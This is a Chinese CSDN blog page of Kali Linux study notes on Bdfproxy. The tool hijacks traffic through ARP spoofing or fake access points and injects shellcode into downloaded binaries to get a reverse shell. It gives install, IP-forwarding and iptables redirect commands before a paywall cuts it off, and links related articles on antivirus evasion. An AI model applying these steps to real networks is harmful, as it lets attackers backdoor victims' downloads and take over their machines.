Kali linux 学习笔记(八十五)免杀——Bdfproxy 2020.4.21

最新推荐文章于 2021-04-20 12:15:48 发布
最新推荐文章于 2021-04-20 12:15:48 发布
阅读量1.1k 收藏 5
点赞数
分类专栏: kali linux 文章标签: linux 安全 免杀 bdfproxy
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44604541/article/details/105656724
版权
本文是Kali Linux学习笔记的一部分,主要介绍Bdfproxy如何实现免杀,包括基于ARP欺骗和无线流量劫持的技术细节。通过集成mitmproxy,利用中间人攻击动态注入shellcode,启动路由功能进行流量劫持。此外,还探讨了使用mana创建Fake AP和badfproxy代理注入代码以反弹shell的方法,并提供了Sysinternals工具的相关资源链接。
摘要由CSDN通过智能技术生成

前言

Bdfproxy

  • 集成mitmproxy
  • 基于流量劫持(中间人攻击)动态注入 shellcode (ARP spoof、DNS spoof、Fake AP)
  • 启动路由功能进行流量劫持
  • 代理端口是8080,故把所有流量都转到8080端口
  • 启动bdfproxy,使得shell反弹

1、基于ARP欺骗

#安装
apt install bdfproxy
apt install backdoor-factory
apt install mitmproxy
#修改 IP 转发
sysctl -w net.ipv4.ip_forward=1
#修改 iptables
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8080
#修改配置文件
vi /etc/bdfproxy/bdfproxy.cfg
 proxyMo
最低0.47元/天 解锁文章
思源湖的鱼
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
BDFProxy:通过MITM修补程序二进制文件
04-01
BDFProxy的新版本将于2021年7月发布,仅向赞助商提供! 赞助者在这里: : 博客: : 后门工厂代理(BDFProxy)v0.3.8 仅适用于安全专业人员和研究人员。 ###现在仅适用于v.0.17> = MITMPROXY> = v.0.11 码头工人: # sudo echo 1 > /proc/sys/net/ipv4/ip_forward # linux # sudo sysctl -w net.inet.ip.forwarding=1 # macOS docker pull secretsquirrel/bdfproxy docker run -it -p 8080:8080 secretsquirrel/bdfproxy bash # ./bdf_proxy.py 要在Kali安装: apt-get update apt-get inst
BDFProxy
cnbird's blog
09-17 2278
https://hackmag.com/security/bdfproxy/ https://github.com/secretsquirrel/BDFProxy
kali linuxBdfproxy
weixin_30825199的博客
03-05 359
Bdfproxy(mitmproxy) 基于流量劫持动态注入shellcode(arp欺骗,dns欺骗,流氓ap) 步骤: 开启流量转发---------sysctl -w net.ipv4.ip_forward=1 配置iptables策略 iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports...
Kali Linux渗透测试 138 后门工具--Bdfproxy
kevinhanser
04-13 1844
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 Kali Linux渗透测试(苑房弘)博客记录 1. 简介 Bdfproxy(mitmproxy)基于流量劫持(中间人攻击)动态注入 shellcode (ARP spoof、DNS spoof、Fake AP) 步骤sysctl -w net.ipv4.
远控免杀专题(15)-DKMC免杀
qq_41683305的博客
03-27 873
0x01 免杀能力一览表 几点说明: 1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。 2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(202...
Kali Linux 2020.4新手入门安装教程详解.docx
02-06
Kali Linux 2020.4 新手入门安装教程详解 一、虚拟机配置 * 使用虚拟机软件 VMware Workstation Pro 16 创建新的虚拟机 * 选择典型安装,完成选择后点击下一步 * 选择稍后安装操作系统,完成选择后点击下一步 * ...
kali-linux-2020.4-installer-amd64 镜像
11-26
kali-linux-2020.4-installer-amd64 镜像,直接下载即可 正常下载很慢,并且容易中断,这是2020年11月25号下载的最新镜像文件
kali-linux-2020.4-installer-amd64镜像阿里下载源.txt
12-23
kali-linux-2020.4-installer-amd64镜像阿里下载源
Kali-Linux-2020.4-vmware-amd64.vmx
07-18
Kali-Linux-2020.4-vmware-amd64.vmx
kali2020.4.txt
01-12
### Kali Linux 2020.4 安装过程中选择软件安装失败的解决方法 在尝试安装 Kali Linux 2020.4 版本时,可能会遇到选择软件安装选项后一直无法成功安装的问题。这通常是由于网络连接不稳定、镜像文件损坏或与系统...
BDFProxy-ng:重写BDFProxy(https
05-23
#The Backdoor Factory Proxy NextGen(BDFProxy-ng)v0.1 bdfproxy-ng是一个分支并回顾了原始BDFProxy( ) ##什么是新的 添加了对deb文件的支持(Debian和Ubuntu) 增加了对ar和xz存档的支持 增加了对mime类型而不是标头的支持 摆脱了各种库来处理不同的存档类型,只支持一种( libarchive-c ) 重构代码,添加更强大的检查 更改了版权:现在是GPL3! ##为什么要分叉,我觉得代码需要进行适当的重新设计才能添加更多功能。 另外,我不喜欢原始项目的版权:) ##如何安装您需要安装requirements.txt列出的python软件包(提示: sudo pip install -r requirements.txt )。 在此之前,您需要从数据包管理器中安装libarchive-dev
wireless_toolkit-2_2-windows
03-12
J2ME Wireless Toolkit(WTK)是常用的J2ME SDK,使用WTK可以进行程序的编译、校验、运行。
j2me_wireless_toolkit-2_1_01-windows(WTK)
05-31
这么老的版本还上传?估计应该有人会有用,sun网站下得,还要注册挺麻烦的。目前最新版WTK2.5
bdfproxy&&mitmproxy版本问题
robacco的博客
03-18 270
一、bdfproxy介绍: msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc 问题开启arp欺骗之后靶机不能上网 ,下载不了。exe文件???? 解决:使用IE浏览器,不用360浏览器。 问题2:如下图后门注入失败,原因是无法读取后门证书文件。 解决:无法读取证书文件,解决方法: 备份并重命名 ro...
Kali Linux渗透测试——免杀基础
Captain_RB的博客
06-01 2143
笔记内容参考安全牛课堂苑房弘老师的Kali Linux渗透测试教程 文章目录一、基础概念(一)恶意软件(二)防护手段(三)免杀技术二、工具介绍(一)Msfvenom(二)Veil-evasion(三)Backdoor-factory 一、基础概念 (一)恶意软件 在用户非自愿情况下执行安装,具有控制、窃取、勒索、攻击等恶意功能的软件,基本分类如下: 病毒:独立存在或者插入在计算机程序中的恶意代码,可通过隐蔽复制进行传播 蠕虫:可以通过网络进行传播的病毒 木马:通过伪装诱使用户运行程序,达到远程控制、破.
kali 虚拟机下 mana-toolkit 的安装
buran的博客
04-20 501
mana-toolkit 的GitHub地址: https://github.com/sensepost/hostapd-mana. 使用 Mana: start-noupstream.sh -Starts access point with no internet access start-nat-simple.sh -Starts an access point with internet access (use this) start-nat-full.sh -Starts a access poi
KaliLinuxNetHunter教程刷入第三方Recovery与开始刷机
01-22 500
KaliLinuxNetHunter教程刷入第三方Recovery与开始刷机 2. 刷入第三方 Recovery (即 TWRP ) ...
神通广大的WiFi劫持工具:Mana
lxl105491的专栏
11-05 7168
Mana是一款国外安全人员为测试而开发的Wifi劫持工具,可以监听计算机或其他移动设备的Wifi通信,并能够模仿该设备。一旦有人连接到 Mana,它会自动运行SSLstrip把加密通信https降级为http请求,绕过或跳转HSTS协议,执行中间人攻击,破解Wifi密码,抓取 cookies,冒充会话。 但这还不是全部,Mana还能够在没有网络访问点的地方,冒充默认的上网入口页面,模
内网劫持渗透利器——MITMf指南
linvex的专栏
10-03 5710
0x01 题记 又是一年十月一,想到小伙伴们都纷纷出门旅游,皆有美酒佳人相伴,再看看我。。。 这张图不是为了发的,是为了让你们看的!谴责你们这些不带我玩儿的!! 哎,不禁潸然泪下。 子曰:“长得丑就要多读书!” 于是有了这篇文章。。。 0x02 闲话少说,进正题 这篇文章的主要目的是介绍一下一个最新的中间人攻击框架,MI
Kali Linux 2020.4新手入门安装+配置教程详解
Kali Linux 2020.4新手入门安装教程详解 本文将为读者提供Kali Linux 2020.4新手入门安装教程的详细说明。该教程将分为三个部分进行讲解:虚拟机配置、Kali Linux配置和更新软件包。以下是具体步骤: 一、虚拟机...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值